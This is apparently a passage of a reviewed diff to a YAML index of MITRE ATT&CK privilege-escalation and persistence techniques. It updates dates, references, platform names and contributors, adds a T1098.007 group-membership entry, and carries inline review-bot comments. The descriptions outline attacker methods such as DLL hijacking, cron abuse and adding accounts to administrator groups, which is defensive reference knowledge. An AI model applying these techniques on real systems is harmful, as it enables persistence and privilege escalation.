+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16420,9 +16682,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16438,12 +16700,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16518,12 +16779,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16543,9 +16803,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
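Review bot: the expanded T1484.002 description introduces a new citation tag `(Citation: AWS RE:Inforce Threat Detection 2024)`, which is defined in the `external_references` hunk below, so the pair is consistent. Unrelated but visible in the unchanged context line, the tag `(Citation: AADInternals zure AD Federated Domain)` reads like a typo for "Azure"; if it is corrected, the matching `source_name` must change in the same commit or the citation will no longer resolve.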
@@ -16565,9 +16830,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
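Review bot: replacing `- Azure AD` and `- SaaS` with `- Identity Provider` under `x_mitre_platforms` (and, later in this diff, `Office 365` / `Google Workspace` / `Azure AD` with `Office Suite` / `Identity Provider` for T1098.003) changes the platform vocabulary this index is keyed on. Any per-platform index or matrix generated from `x_mitre_platforms` that still filters on the old names will silently drop these techniques, so the generators and the platform-specific index files should be updated in the same PR and the `x_mitre_version` bump to `'2.1'` reviewed against the upstream object.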
@@ -16584,6 +16848,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16617,7 +16885,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16773,31 +17040,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16814,6 +17061,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16824,9 +17072,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16834,13 +17086,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
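Review bot: the T1053.003 object is reordered rather than changed: every field removed in the earlier hunk (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, and both `external_references` entries) reappears here, with `url` and `external_id` swapped within the `mitre-attack` reference, which is harmless. The genuinely new content is `revoked: false`, `x_mitre_remote_support: false`, `x_mitre_deprecated: false`, and `x_mitre_attack_spec_version` going from `2.1.0` to `3.2.0`; a reviewer should confirm these against the upstream object rather than trusting the large removed/added blocks as a no-op.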
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16870,6 +17138,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16880,6 +17149,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16888,13 +17158,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16936,9 +17206,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -17006,19 +17273,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -17034,8 +17300,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -17049,7 +17315,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -17075,6 +17341,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
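Review bot: the added `Hexacorn DLL Hijacking` reference is well formed and backs the new `(Citation: Hexacorn DLL Hijacking)` tag inserted into the description above, so the pair is consistent. The adjacent unchanged context line `description: Microsoft. (, May 23). Microsoft Security Advisory 2269637.` has an empty year in the citation; that is a pre-existing defect, and since this file appears to be generated from upstream data the fix belongs upstream rather than in this PR.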
@@ -17102,12 +17372,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -17133,7 +17402,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -17175,7 +17444,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17253,11 +17521,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17337,7 +17604,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
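Review bot: the new T1098.007 entry lists `- macOS` under `x_mitre_platforms`, but the description and all five references cover only Windows (`net localgroup`, `net group`, Remote Desktop Users) and Linux (`usermod`, sudoers); confirm macOS is on the upstream object, since nothing here substantiates it. Two smaller points: `x_mitre_detection: ''` is empty, and the block carries no `identifier: T1098.007` key while neighbouring entries such as T1053.003 and T1098.003 do, so check whether the generator emits `identifier` conditionally or this was dropped.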
@@ -17360,7 +17697,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17408,8 +17745,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
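Review bot: as with T1548.003 earlier in the diff, T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement in this hunk, leaving the object without any spec version while other updated entries carry `x_mitre_attack_spec_version: 3.2.0`; either add the `3.2.0` value or document why these older objects are treated differently.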
@@ -17441,7 +17776,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17496,13 +17831,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
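Review bot: T1546.011 gets the same treatment as T1548.003 and T1055.003, dropping `spec_version` and `x_mitre_attack_spec_version: 2.1.0` together with nothing added back, so it ends up with no spec version field at all. If the intent is that all techniques now report `x_mitre_attack_spec_version: 3.2.0`, this object (and the other two) should be regenerated; if not, a one-line note in the PR description explaining the split would save the next reviewer the same question.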
@@ -17563,9 +17896,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17574,7 +17907,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17627,7 +17959,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17648,12 +17980,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17756,7 +18087,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17856,12 +18186,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17874,7 +18203,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17887,7 +18215,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17917,7 +18244,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17944,7 +18272,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17970,13 +18298,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -18053,12 +18379,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18077,6 +18402,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -18084,7 +18410,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -18104,34 +18429,36 @@ privilege-escalation:
